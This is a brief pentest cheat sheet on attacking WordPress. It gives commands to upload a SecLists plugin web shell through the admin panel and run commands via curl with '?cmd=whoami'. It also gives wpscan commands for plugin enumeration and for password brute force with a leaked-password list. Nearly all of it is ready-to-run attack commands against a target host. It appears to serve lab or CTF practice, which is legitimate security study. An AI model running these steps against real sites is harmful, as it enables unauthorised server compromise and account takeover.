# WordPress

* <https://www.hackingarticles.in/wordpress-reverse-shell/>

## Custom Plugin

Write a web shell with a custom plugin.

Copy a plugin shell from SecLists and zip it:

```
$ cp /usr/share/seclists/Web-Shells/WordPress/plugin-shell.php .
$ zip plugin-shell.zip plugin-shell.php
```

Upload `plugin-shell.zip` (Plugins > Add New) and install it (Upload Plugin > Browse... > Install Now) **but do not activate**! Now you can access the web shell:

```
$ curl 'http://10.10.13.37/wp-content/plugins/plugin-shell/plugin-shell.php?cmd=whoami'
```

## wpscan

* <https://github.com/wpscanteam/wpscan>
* <https://wpscan.com/profile>

```
$ wpscan --url http://10.10.13.37/wp/ --api-token <API_TOKEN> --force -e ap [--plugins-detection aggressive] --disable-tls-checks -o wpscan.out
$ wpscan --url http://10.10.13.37/wp/ --api-token <API_TOKEN> --force --passwords /usr/share/seclists/Passwords/darkweb2017-top1000.txt --disable-tls-checks
```